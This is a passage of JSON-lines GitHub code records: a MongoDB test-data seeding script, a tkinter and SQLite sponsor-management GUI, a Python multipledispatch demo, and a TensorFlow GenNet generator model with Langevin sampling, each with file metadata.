(random.randint(-3000, 3000) / 10000),\n -0.1832 + (random.randint(-3000, 3000) / 10000))\n )\n device.warning_level = 5\n device.setup_complete = True\n device.warning_level_percentage = 50\n device.installation_comment = ''\n device.comments = ''\n device.pinned = False\n await device.save()\n print('made')\n\n\nasyncio.run(main())\n", "repo_name": "pikachunerdy/fastapi-demo", "sub_path": "tests/create_data/create_devices.py", "file_name": "create_devices.py", "file_ext": "py", "file_size_in_byte": 3535, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "os.getcwd", "line_number": 13, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 14, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 14, "usage_type": "attribute"}, {"api_name": "passlib.context.CryptContext", "line_number": 17, "usage_type": "call"}, {"api_name": "motor.motor_asyncio.AsyncIOMotorClient", "line_number": 21, "usage_type": "call"}, {"api_name": "motor.motor_asyncio", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 22, "usage_type": "attribute"}, {"api_name": "beanie.init_beanie", "line_number": 23, "usage_type": "call"}, {"api_name": "os.environ", "line_number": 23, "usage_type": "attribute"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompanyAccount", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 23, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany.find_one", "line_number": 35, "usage_type": "call"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany", "line_number": 35, "usage_type": "name"}, {"api_name": "schemas.mongo_models.account_models.MongoCompany.name", "line_number": 35, "usage_type": "attribute"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 40, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice.construct", "line_number": 40, "usage_type": "call"}, {"api_name": "time.time", "line_number": 49, "usage_type": "call"}, {"api_name": "time.time", "line_number": 56, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.GeoJson2DPoint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 57, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 58, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice", "line_number": 69, "usage_type": "name"}, {"api_name": "schemas.mongo_models.device_models.MongoDevice.construct", "line_number": 69, "usage_type": "call"}, {"api_name": "time.time", "line_number": 78, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDeviceDataEntry.construct", "line_number": 80, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.MongoDeviceDataEntry", "line_number": 80, "usage_type": "name"}, {"api_name": "math.sin", "line_number": 82, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 82, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 85, "usage_type": "call"}, {"api_name": "schemas.mongo_models.device_models.GeoJson2DPoint", "line_number": 86, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 87, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 88, "usage_type": "call"}, {"api_name": "asyncio.run", "line_number": 100, "usage_type": "call"}]}
+{"seq_id": "25662713572", "text": "\"\"\"\r\nsponsor_manager.py\r\nAuthor: Timothy Gist\r\nDatabase Support: Maranda Dodgson\r\n12/13/2023: The Sponsor Manager program is meant to be a utility to allow the club to manage sponsors.\r\nfunctionality includes a login function to restrict access to the information contained herein.\r\nThe main program allows the user to view entries in the database in order to better manage\r\ninteraction with those sponsors. See the 'about' function from the menubar for more detailed\r\ninformation about the specific functions available.\r\nThere is also functionality that allows the user to add new sponsors and then return to the main program.\r\nThis is not intended to be the final version at this time, but rather a working prototype that can\r\nallow for greater functionality in the future.\r\n12/14/2023: Added formatting to the output for cleaner, more readable text.\r\n\"\"\"\r\n\r\nimport tkinter as tk\r\nimport tkinter.messagebox as tkmessagebox\r\nfrom login_module_V3 import *\r\nimport sqlite3\r\nfrom tkinter import ttk\r\nfrom new_sponsor import *\r\n\r\nlogin()\r\n\r\n\r\n# Create base window\r\nroot = tk.Tk()\r\nroot.title('Sponsor Manager')\r\nroot.geometry('700x700')\r\n\r\n\r\ndef group_members():\r\n result = tkmessagebox.showinfo('Team Members',\r\n 'Team Leader: Timothy Gist \\nDatabase Support: Maranda Dodgson', icon=\"info\")\r\n\r\n\r\ndef about():\r\n about_page = tk.Tk()\r\n about_page.title(\"How to\")\r\n about_page.geometry(\"800x800\")\r\n about_page.configure(background='grey')\r\n panel = tk.Text(about_page, height=50, width=100)\r\n f = open(\"about.txt\", \"r\")\r\n\r\n for line in f:\r\n panel.insert('end', line)\r\n\r\n f.close()\r\n\r\n panel.grid(row=0, column=0)\r\n # scrollbar = ttk.Scrollbar(panel, orient='vertical', command=panel.yview)\r\n # scrollbar.grid(row=0, column=1, sticky=tk.NS)\r\n # panel['yscrollcommand'] = scrollbar.set\r\n about_page.mainloop()\r\n\r\n\r\ndef goodbye():\r\n result = tkmessagebox.askquestion('System', 'Are you sure you want to exit?', icon=\"warning\")\r\n if result == 'yes':\r\n root.destroy()\r\n exit()\r\n\r\n\r\nroot_menubar = tk.Menu(root)\r\nroot.config(menu=root_menubar)\r\nfile_menu = tk.Menu(root_menubar, tearoff=False)\r\nfile_menu.add_command(label='Team Members', command=group_members)\r\nfile_menu.add_command(label='About', command=about)\r\nfile_menu.add_command(label=\"Exit\", command=goodbye)\r\nroot_menubar.add_cascade(label=\"File\", menu=file_menu)\r\n# Create frame to hold group member labels\r\nframe = tk.LabelFrame(root, text=\"Group 1 Team Members\", relief=tk.RAISED, padx=12, pady=12)\r\nframe.grid(row=0, column=0, columnspan=5)\r\n\r\n\r\n# Buttons for functionality\r\ndef sponsors():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM sponsors')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', '----------\\n')\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef membership():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT * FROM Membership_level')\r\n records = cur.fetchall()\r\n print_records = ''\r\n item_label = ['ID', 'Level', 'Renewal', 'Cost']\r\n for record in records:\r\n count = 0\r\n for item in record:\r\n print_records += f'{item_label[count]: >10}: {str(item): <10} \\n'\r\n count += 1\r\n\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef member_level():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT Membership_level FROM Membership_level')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef sponsor_names():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT Sponsor_Name FROM sponsors')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n print_records += f'Sponsor Name: {str(record[0])} \\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef payment_received():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT Sponsor_Name FROM sponsors WHERE Payment_Received = \"Yes\"')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef payment_not_received():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('SELECT Sponsor_Name FROM sponsors WHERE Payment_Received = \"No\"')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef sponsor_level():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_level \r\n FROM Sponsors JOIN Sponsors.Membership_ID ON Membership_level.Membership_ID''')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef membership_cost():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_cost \r\n FROM Sponsors JOIN Membership_level.Membership_ID ON Sponsors.Membership_id''')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef membership_renewal():\r\n txt_edit.delete(1.0, tk.END)\r\n conn = sqlite3.connect('db_member.db')\r\n cur = conn.cursor()\r\n cur.execute('''SELECT Sponsors.Sponsor_Name, Membership_level.Membership_renewal, Membership_level.Membership_cost \r\n FROM Sponsors JOIN Membership_level.Membership_ID ON Sponsors.Membership_id''')\r\n records = cur.fetchall()\r\n print_records = ''\r\n for record in records:\r\n for item in record:\r\n print_records += str(item) + '\\n'\r\n txt_edit.insert('end', f'{print_records} \\n')\r\n print_records = ''\r\n\r\n conn.commit()\r\n conn.close()\r\n\r\n\r\ndef add_sponsor():\r\n new_sponsor()\r\n\r\n\r\n# Create the text box for query output\r\ntxt_edit = tk.Text(root)\r\n# Create the frame to hold the buttons\r\nfrm_buttons = tk.Frame(root, relief=tk.RAISED)\r\n# Create the buttons\r\nbtn1 = tk.Button(frm_buttons, text='Sponsors', command=sponsors)\r\nbtn2 = tk.Button(frm_buttons, text=\"Membership\", command=membership)\r\nbtn3 = tk.Button(frm_buttons, text='Membership Level', command=member_level)\r\nbtn4 = tk.Button(frm_buttons, text='Sponsor Names', command=sponsor_names)\r\nbtn5 = tk.Button(frm_buttons, text='Payment Received', command=payment_received)\r\nbtn6 = tk.Button(frm_buttons, text='Payment Not received', command=payment_not_received)\r\nbtn7 = tk.Button(frm_buttons, text='Sponsor Level', command=sponsor_level, state='disabled')\r\nbtn8 = tk.Button(frm_buttons, text='Membership Cost', command=membership_cost, state='disabled')\r\nbtn9 = tk.Button(frm_buttons, text='Membership Renewal', command=membership_renewal, state='disabled')\r\nbtn10 = tk.Button(frm_buttons, text='Add New Sponsor', command=add_sponsor)\r\n# Place everything in the main window\r\nbtn1.grid(row=1, column=0, padx=5, pady=5)\r\nbtn2.grid(row=2, column=0, padx=5, pady=5)\r\nbtn3.grid(row=3, column=0, padx=5, pady=5)\r\nbtn4.grid(row=4, column=0, padx=5, pady=5)\r\nbtn5.grid(row=5, column=0, padx=5, pady=5)\r\nbtn6.grid(row=6, column=0, padx=5, pady=5)\r\nbtn7.grid(row=7, column=0, padx=5, pady=5)\r\nbtn8.grid(row=8, column=0, padx=5, pady=5)\r\nbtn9.grid(row=9, column=0, padx=5, pady=5)\r\nbtn10.grid(row=10, column=0, padx=5, pady=5)\r\n\r\nfrm_buttons.grid(row=1, column=0, sticky=\"ns\")\r\ntxt_edit.grid(row=1, column=1, sticky=\"nsew\")\r\n\r\nroot.mainloop()\r\n", "repo_name": "AtlasIdol/SDEV220-Final-Project", "sub_path": "sponsor_manager.py", "file_name": "sponsor_manager.py", "file_ext": "py", "file_size_in_byte": 9127, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "tkinter.Tk", "line_number": 27, "usage_type": "call"}, {"api_name": "tkinter.messagebox.showinfo", "line_number": 33, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 33, "usage_type": "name"}, {"api_name": "tkinter.Tk", "line_number": 38, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 42, "usage_type": "call"}, {"api_name": "tkinter.messagebox.askquestion", "line_number": 58, "usage_type": "call"}, {"api_name": "tkinter.messagebox", "line_number": 58, "usage_type": "name"}, {"api_name": "tkinter.Menu", "line_number": 64, "usage_type": "call"}, {"api_name": "tkinter.Menu", "line_number": 66, "usage_type": "call"}, {"api_name": "tkinter.LabelFrame", "line_number": 72, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tkinter.END", "line_number": 78, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 79, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 96, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 97, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 117, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 118, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 134, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 135, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 150, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 151, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 167, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 168, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 184, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 185, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 202, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 203, "usage_type": "call"}, {"api_name": "tkinter.END", "line_number": 220, "usage_type": "attribute"}, {"api_name": "sqlite3.connect", "line_number": 221, "usage_type": "call"}, {"api_name": "tkinter.Text", "line_number": 242, "usage_type": "call"}, {"api_name": "tkinter.Frame", "line_number": 244, "usage_type": "call"}, {"api_name": "tkinter.RAISED", "line_number": 244, "usage_type": "attribute"}, {"api_name": "tkinter.Button", "line_number": 246, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 247, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 248, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 249, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 250, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 251, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 252, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 253, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 254, "usage_type": "call"}, {"api_name": "tkinter.Button", "line_number": 255, "usage_type": "call"}]}
+{"seq_id": "32232500648", "text": "import math\nfrom multipledispatch import dispatch\n@dispatch(int)\ndef sum(a):\n print(\"Square root value: \")\n print(a**2)\n@dispatch(int,int,int,int)\ndef sum(a,b,c,d):\n print(\"Addition of 4 numbers: \")\n print(a+b+c+d)\n@dispatch(int,int,int)\ndef sum(a,b,c):\n print(\"Multiplication of 3 values: \")\n print(a*b*c)\n@dispatch(int,int)\ndef sum(p,q):\n t=p*q\n print(\"root value\")\n print(t)\n if t<0:\n print(\"Not possible\")\n else:\n r=math.isqrt(t)\n print(\"root of\")\n print(r)\n if r**2==t:\n print(\"This is perfect square\")\n else:\n print(\"This is not a perfect square\")\nsum(7)\nsum(4,3,9,0)\nsum(2,6,3)\nsum(3,3)\n\n\n\n\n\n", "repo_name": "Meghna131995/VSCode_RobotFramework_MeghnaSuresh", "sub_path": "methodOverloading.py", "file_name": "methodOverloading.py", "file_ext": "py", "file_size_in_byte": 696, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "multipledispatch.dispatch", "line_number": 3, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 7, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 11, "usage_type": "call"}, {"api_name": "math.isqrt", "line_number": 23, "usage_type": "call"}, {"api_name": "multipledispatch.dispatch", "line_number": 15, "usage_type": "call"}]}
+{"seq_id": "36467596222", "text": "from __future__ import division\n\nimport os\nimport math\nimport numpy as np\nimport tensorflow as tf\nimport matplotlib.pyplot as plt\n\nfrom ops import *\nfrom datasets import *\n\n\nclass GenNet(object):\n def __init__(self, sess, config):\n self.sess = sess\n self.batch_size = config.batch_size\n self.image_size = config.image_size\n\n self.g_lr = config.g_lr\n self.beta1 = config.beta1\n self.delta = config.delta\n self.sigma = config.sigma\n self.sample_steps = config.sample_steps\n self.z_dim = config.z_dim\n\n self.num_epochs = config.num_epochs\n self.data_path = os.path.join(config.data_path, config.category)\n self.log_step = config.log_step\n self.output_dir = os.path.join(config.output_dir, config.category)\n\n self.log_dir = os.path.join(self.output_dir, 'log')\n self.sample_dir = os.path.join(self.output_dir, 'sample')\n self.model_dir = os.path.join(self.output_dir, 'checkpoints')\n\n if tf.gfile.Exists(self.log_dir):\n tf.gfile.DeleteRecursively(self.log_dir)\n tf.gfile.MakeDirs(self.log_dir)\n if not os.path.exists(self.model_dir):\n os.makedirs(self.model_dir)\n if not os.path.exists(self.sample_dir):\n os.makedirs(self.sample_dir)\n\n self.z = tf.placeholder(shape=[None, self.z_dim], dtype=tf.float32, name=\"latent\") \n self.real_image = tf.placeholder(\n shape=[None, self.image_size, self.image_size, 3], dtype=tf.float32, name=\"real\")\n\n self.build_model()\n\n def generator(self, inputs, reuse=False, is_training=True):\n ####################################################\n # Define the structure of generator, you may use the\n # generator structure of DCGAN. ops.py defines some\n # layers that you may use.\n ####################################################\n def batch_norm(input, epsilon=1e-5, momentum=0.9, train=True, name=\"batch_norm\"):\n return tf.contrib.layers.batch_norm(input, decay=momentum,\n updates_collections=None, epsilon=epsilon,\n scale=True, is_training=is_training, scope=name)\n\n with tf.variable_scope('gen', reuse=reuse):\n h1r = tf.expand_dims(tf.expand_dims(inputs, 1), 1)\n\n h2 = tf.layers.conv2d_transpose(h1r, 3*128, [4, 4], strides=(2, 2), padding='valid', name='g_cv2')\n h2r = leaky_relu(batch_norm(h2, train=is_training, name='g_bn2'))\n\n h3 = tf.layers.conv2d_transpose(h2r, 3*64, [5, 5], strides=(2, 2), padding='same', name='g_cv3')\n h3r = leaky_relu(batch_norm(h3, train=is_training, name='g_bn3'))\n\n h4 = tf.layers.conv2d_transpose(h3r, 3*32, [5, 5], strides=(2, 2), padding='same', name='g_cv4')\n h4r = leaky_relu(batch_norm(h4, train=is_training, name='g_bn4'))\n\n h5 = tf.layers.conv2d_transpose(h4r, 3*16, [5, 5], strides=(2, 2), padding='same', name='g_cv5')\n h5r = leaky_relu(batch_norm(h5, train=is_training, name='g_bn5'))\n\n h6 = tf.layers.conv2d_transpose(h5r, 3, [5, 5], strides=(2, 2), padding='same', name='g_cv6')\n\n return tf.nn.tanh(h6)\n\n\n def langevin_dynamics(self, z, Y):\n ####################################################\n # Define Langevin dynamics sampling operation.\n # To define multiple sampling steps, you may use\n # tf.while_loop to define a loop on computation graph.\n # The return should be the updated z.\n ####################################################\n def step(z, Y, i):\n sigma = self.sigma\n delta = self.delta\n fz = self.generator(z, reuse=True)\n grad = tf.gradients(0.5/(sigma**2)*tf.norm(Y - fz, ord=2, axis=0), z, name='grad_z')[0]\n energy = - grad - z\n noise = tf.random_normal(shape=tf.shape(z), name='noise')\n z = z + delta*noise + 0.5*(delta**2)*energy\n i += 1\n return z, Y, i\n \n cond = lambda z, Y, i: tf.less(i, self.sample_steps)\n body = lambda z, Y, i: step(z, Y, i)\n \n with tf.name_scope(\"langevin\"):\n i = tf.constant(0)\n output, _, _ = tf.while_loop(cond, body, [z, Y, i])\n \n return output\n\n\n def build_model(self):\n ####################################################\n # Define the learning process. Record the loss.\n ####################################################\n \n self.train_z = self.generator(self.z, reuse = False)\n self.gen_z = self.generator(self.z, reuse = True)\n \n # loss\n self.train_loss = tf.reduce_sum(0.5/(self.sigma**2)*tf.norm(self.real_image - self.train_z, ord=2, axis=0) )\n \n self.sampler = self.langevin_dynamics(self.z, self.real_image)\n \n # optimizer\n self.vars = [var for var in tf.trainable_variables() if 'gen' in var.name]\n self.optim = tf.train.AdamOptimizer(self.g_lr, beta1=self.beta1).minimize(self.train_loss, var_list=self.vars)\n \n \n\n def train(self):\n # Prepare training data\n train_data = DataSet(self.data_path, image_size=self.image_size)\n train_data = train_data.to_range(-1, 1)\n\n num_batches = int(math.ceil(len(train_data) / self.batch_size))\n summary_op = tf.summary.merge_all()\n\n self.sess.run(tf.global_variables_initializer())\n self.sess.run(tf.local_variables_initializer())\n\n saver = tf.train.Saver(max_to_keep=50)\n writer = tf.summary.FileWriter(self.log_dir, self.sess.graph)\n self.sess.graph.finalize()\n\n print('Start training ...')\n\n ####################################################\n # Train the model here. Print the loss term at each\n # epoch to monitor the training process. You may use\n # save_images() in ./datasets.py to save images. At\n # each log_step, record model in self.model_dir,\n # reconstructed images and synthesized images in\n # self.sample_dir, loss in self.log_dir (using writer).\n ####################################################\n data_len = train_data.shape[0]\n \n t_loss_log = []\n counter = 0\n sample = np.zeros((self.batch_size, self.z_dim))\n \n for epoch in range(self.num_epochs):\n batch_idxs = data_len // self.batch_size\n\n for idx in range(batch_idxs):\n counter += 1\n batch_images = train_data[idx * self.batch_size:min(data_len, (idx+1)*self.batch_size)] \n \n _, t_loss = self.sess.run([self.optim, self.train_loss], feed_dict={\n self.real_image: batch_images,\n self.z: sample})\n \n sample = self.sess.run(self.sampler, feed_dict={self.z: sample,\n self.real_image: batch_images}) \n \n t_loss_log.append(t_loss)\n \n \n if epoch % 50 == 0:\n print(\"Epoch[%2d], train_loss: %.6f\" % (epoch, t_loss))\n # recon\n recon = self.sess.run(self.gen_z, {self.z: sample})\n # random image\n z = np.random.normal(size=[64, self.z_dim])\n gen = self.sess.run(self.gen_z, {self.z: z})\n # interpolation\n grid = np.linspace(-2,2,8)\n inter_z = np.array(np.meshgrid(grid, grid)).reshape(2,-1).T\n inter = self.sess.run(self.gen_z, {self.z: inter_z})\n save_images(inter, \"%s/interpolation-%03d.png\" % (self.sample_dir, epoch))\n \n # save image\n if not os.path.exists(self.sample_dir):\n os.makedirs(self.sample_dir)\n save_images(gen, \"%s/generation-%03d.png\" % (self.sample_dir, epoch))\n save_images(recon, \"%s/reconstruction-%03d.png\" % (self.sample_dir, epoch))\n \n \n plt.plot(t_loss_log)\n plt.title('Training Loss')\n plt.ylabel('Loss')\n plt.xlabel('Epoch')\n plt.savefig(\"%s/loss.png\" % (self.sample_dir))\n plt.clf()\n\n", "repo_name": "Alice86/DeepLearning", "sub_path": "232_5_GenNet_DesNet_tensorflow/GenNet/GenNet.py", "file_name": "GenNet.py", "file_ext": "py", "file_size_in_byte": 8451, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "os.path.join", "line_number": 27, "usage_type": "call"}, {"api_name": "os.path", "line_number": 27, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path", "line_number": 31, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 32, "usage_type": "call"}, {"api_name": "os.path", "line_number": 32, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 33, "usage_type": "call"}, {"api_name": "os.path", "line_number": 33, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.Exists", "line_number": 35, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 35, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.DeleteRecursively", "line_number": 36, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 36, "usage_type": "attribute"}, {"api_name": "tensorflow.gfile.MakeDirs", "line_number": 37, "usage_type": "call"}, {"api_name": "tensorflow.gfile", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 38, "usage_type": "call"}, {"api_name": "os.path", "line_number": 38, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 39, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 41, "usage_type": "call"}, {"api_name": "tensorflow.placeholder", "line_number": 43, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 43, "usage_type": "attribute"}, {"api_name": "tensorflow.placeholder", "line_number": 44, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 45, "usage_type": "attribute"}, {"api_name": "tensorflow.contrib.layers.batch_norm", "line_number": 56, "usage_type": "call"}, {"api_name": "tensorflow.contrib", "line_number": 56, "usage_type": "attribute"}, {"api_name": "tensorflow.variable_scope", "line_number": 60, "usage_type": "call"}, {"api_name": "tensorflow.expand_dims", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 63, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 63, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 66, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 66, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 72, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 72, "usage_type": "attribute"}, {"api_name": "tensorflow.layers.conv2d_transpose", "line_number": 75, "usage_type": "call"}, {"api_name": "tensorflow.layers", "line_number": 75, "usage_type": "attribute"}, {"api_name": "tensorflow.nn.tanh", "line_number": 77, "usage_type": "call"}, {"api_name": "tensorflow.nn", "line_number": 77, "usage_type": "attribute"}, {"api_name": "tensorflow.gradients", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 91, "usage_type": "call"}, {"api_name": "tensorflow.random_normal", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.shape", "line_number": 93, "usage_type": "call"}, {"api_name": "tensorflow.less", "line_number": 98, "usage_type": "call"}, {"api_name": "tensorflow.name_scope", "line_number": 101, "usage_type": "call"}, {"api_name": "tensorflow.constant", "line_number": 102, "usage_type": "call"}, {"api_name": "tensorflow.while_loop", "line_number": 103, "usage_type": "call"}, {"api_name": "tensorflow.reduce_sum", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.norm", "line_number": 117, "usage_type": "call"}, {"api_name": "tensorflow.trainable_variables", "line_number": 122, "usage_type": "call"}, {"api_name": "tensorflow.train.AdamOptimizer", "line_number": 123, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 123, "usage_type": "attribute"}, {"api_name": "math.ceil", "line_number": 132, "usage_type": "call"}, {"api_name": "tensorflow.summary.merge_all", "line_number": 133, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 133, "usage_type": "attribute"}, {"api_name": "tensorflow.global_variables_initializer", "line_number": 135, "usage_type": "call"}, {"api_name": "tensorflow.local_variables_initializer", "line_number": 136, "usage_type": "call"}, {"api_name": "tensorflow.train.Saver", "line_number": 138, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 138, "usage_type": "attribute"}, {"api_name": "tensorflow.summary.FileWriter", "line_number": 139, "usage_type": "call"}, {"api_name": "tensorflow.summary", "line_number": 139, "usage_type": "attribute"}, {"api_name": "numpy.zeros", "line_number": 156, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 180, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 180, "usage_type": "attribute"}, {"api_name": "numpy.linspace", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 184, "usage_type": "call"}, {"api_name": "numpy.meshgrid", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 189, "usage_type": "call"}, {"api_name": "os.path", "line_number": 189, "usage_type": "attribute"}, {"api_name": "os.makedirs", "line_number": 190, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 195, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 195, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 196, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 196, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", 